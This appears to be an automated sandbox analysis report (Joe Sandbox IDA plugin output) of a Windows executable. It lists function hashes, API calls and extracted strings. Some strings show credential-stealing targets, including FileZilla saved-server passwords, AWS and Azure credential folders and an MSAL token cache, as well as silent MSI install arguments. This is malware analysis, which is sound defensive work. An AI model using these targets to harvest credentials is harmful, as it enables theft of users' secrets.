                    • Opcode ID: 2e131ac107b5869dcf288ea33e285aa41183704a9f8f5d9749862df1f2e8ba1b
                    • Instruction ID: 9b119d3ceed4079f7c340c173e49dc1c63a0adcf564766473d671775b05f69f7
                    • Opcode Fuzzy Hash: 2e131ac107b5869dcf288ea33e285aa41183704a9f8f5d9749862df1f2e8ba1b
                    • Instruction Fuzzy Hash: 3891C9B9FD0320BEE3106BE27D03F243A9197B1F49FA5113BFA04692E2F6E91514465E
                    Strings
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                    • SF0LUNB9OE6XC, xrefs: 004045D2
                    • Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                    • F0TWHCR2F6Z9, xrefs: 004045F3
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                    • er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                    • olo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                    • er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                    • OADZU5, xrefs: 004045C7
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                    • er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                    • er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                    • A6UYB6E9WDSYQWYMHCU4LGBUVKRZVFVYF1HL8OK8I28F85SG, xrefs: 004045DD
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                    • ianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                    • er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: A6UYB6E9WDSYQWYMHCU4LGBUVKRZVFVYF1HL8OK8I28F85SG$Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$F0TWHCR2F6Z9$OADZU5$SF0LUNB9OE6XC$er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$olo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 0-2182738262
                    • Opcode ID: 7ec8420cb7fbb92e3b9dac634e6e561209ac50f0bb2ad10c25cf711909d82004
                    • Instruction ID: 0478123035047c0a4e6da9b6409727c73bcdf1cfa19446a39dded10aa011e9d1
                    • Opcode Fuzzy Hash: 7ec8420cb7fbb92e3b9dac634e6e561209ac50f0bb2ad10c25cf711909d82004
                    • Instruction Fuzzy Hash: C041BB79740624EBC7189FE5FC8DB987F60AB4C712BA0C062F90299190CBF9D5019B3D
                    Strings
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004019EE
                    • st Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401898
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401B86
                    • rt pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401881
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401C3F
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401AA6
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004019D7
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004017F1
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004019BD
                    • ish-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401967
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401B6F
                    • ZZ53F0TWHCR2F6Z9, xrefs: 00401808
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401ABD
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040197D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ZZ53F0TWHCR2F6Z9$ish-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$rt pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$st Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 0-2400977591
                    • Opcode ID: 8eb6a25d104e9b810a5064ab52aa8f5da5954ef80762faaeed8dc5af51a7872a
                    • Instruction ID: 39d00e11cde3818330ac08f623c81c852c64dcafcc1d6f8b5eceb62ce14d4984
                    • Opcode Fuzzy Hash: 8eb6a25d104e9b810a5064ab52aa8f5da5954ef80762faaeed8dc5af51a7872a
                    • Instruction Fuzzy Hash: F51260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                    • API String ID: 0-514892060
                    • Opcode ID: 5617bd6bc83757f25327082bfbfb60fa8d0a6348b7b524702c500f70768eef60
                    • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                    • Opcode Fuzzy Hash: 5617bd6bc83757f25327082bfbfb60fa8d0a6348b7b524702c500f70768eef60
                    • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                    • API String ID: 0-817767981
                    • Opcode ID: c3ad0e5f37a6afd264e19c98f003c489031be70fef7a74d9d5741692706db697
                    • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                    • Opcode Fuzzy Hash: c3ad0e5f37a6afd264e19c98f003c489031be70fef7a74d9d5741692706db697
                    • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                    • API String ID: 0-974132213
                    • Opcode ID: 63500b277e5d8c6ba40ed9413d1edfa83572fad66260e383529a6b6b95d2c298
                    • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                    • Opcode Fuzzy Hash: 63500b277e5d8c6ba40ed9413d1edfa83572fad66260e383529a6b6b95d2c298
                    • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                    APIs
                    • __getptd.LIBCMT ref: 0041C74E
                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                    • __getptd.LIBCMT ref: 0041C765
                    • __amsg_exit.LIBCMT ref: 0041C773
                    • __lock.LIBCMT ref: 0041C783
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                    Strings
                    • cdefghijklmnopqrstuvwxyz, xrefs: 0041C755
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID: cdefghijklmnopqrstuvwxyz
                    • API String ID: 938513278-2004723410
                    • Opcode ID: 355d926354504f605bf63a083571741bbcfc67458f74eb70e54842a85c90e286
                    • Instruction ID: f221cbc75ab16e387751c9b116ef15a62a105912f32ca5c84f33c5bc9026f8a6
                    • Opcode Fuzzy Hash: 355d926354504f605bf63a083571741bbcfc67458f74eb70e54842a85c90e286
                    • Instruction Fuzzy Hash: 72F09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E
                    APIs
                    • __getptd.LIBCMT ref: 0041C9EA
                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                    • __amsg_exit.LIBCMT ref: 0041CA0A
                    • __lock.LIBCMT ref: 0041CA1A
                    Strings
                    • invalid string position, xrefs: 0041C9E0
                    • cdefghijklmnopqrstuvwxyz, xrefs: 0041C9F1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit$__getptd__getptd_noexit__lock
                    • String ID: cdefghijklmnopqrstuvwxyz$invalid string position
                    • API String ID: 3445076945-1556353147
                    • Opcode ID: e76d0c216dfbc18853365bd0fa83689a94f09e66430c80d3606cd507cbddbdce
                    • Instruction ID: 7f31c5254ef7052323bd295075bc031dd33fd82d1b7aa06430cf1dcd4438de76
                    • Opcode Fuzzy Hash: e76d0c216dfbc18853365bd0fa83689a94f09e66430c80d3606cd507cbddbdce
                    • Instruction Fuzzy Hash: 2C01C431A817299BC722EB669C857DE77A0BF04794F01811BE804A7390C72C69D2CBDD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: /i "$ /passive$"" $.dll$.msi$<
                    • API String ID: 0-1961616256
                    • Opcode ID: 057776c1ec341ebaa2f67c51f371f1357a11d931ce7cfcfbceaad719773efdd2
                    • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                    • Opcode Fuzzy Hash: 057776c1ec341ebaa2f67c51f371f1357a11d931ce7cfcfbceaad719773efdd2
                    • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 0-2791005934
                    • Opcode ID: 8d487e1654f754ba5a0761ee3c5de5ee89a113c5c6ab67c4e72828168a8328fb
                    • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                    • Opcode Fuzzy Hash: 8d487e1654f754ba5a0761ee3c5de5ee89a113c5c6ab67c4e72828168a8328fb
                    • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __aulldiv
                    • String ID: %d MB$@
                    • API String ID: 3732870572-3474575989
                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                    • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                    • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                    • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: "$"$------$------$------
                    • API String ID: 0-2180234286
                    • Opcode ID: 4205a6c64491eede6f2c0190817c01b6d1188d899bee5cc8d5380a99dbe7c93c
                    • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                    • Opcode Fuzzy Hash: 4205a6c64491eede6f2c0190817c01b6d1188d899bee5cc8d5380a99dbe7c93c
                    • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: "$"$------$------$------
                    • API String ID: 0-2180234286
                    • Opcode ID: 8871a7e0db803886412357a9f8af80b172f418654194f3178fcef7dc839d38c6
                    • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                    • Opcode Fuzzy Hash: 8871a7e0db803886412357a9f8af80b172f418654194f3178fcef7dc839d38c6
                    • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 0-1526165396
                    • Opcode ID: 27b5e4fc1ccec6ec32ab3a02e27eb1e148215a6b2441a2f08a44eb7b46b35e9a
                    • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                    • Opcode Fuzzy Hash: 27b5e4fc1ccec6ec32ab3a02e27eb1e148215a6b2441a2f08a44eb7b46b35e9a
                    • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __aulldiv
                    • String ID: @
                    • API String ID: 3732870572-2766056989
                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                    • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                    • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
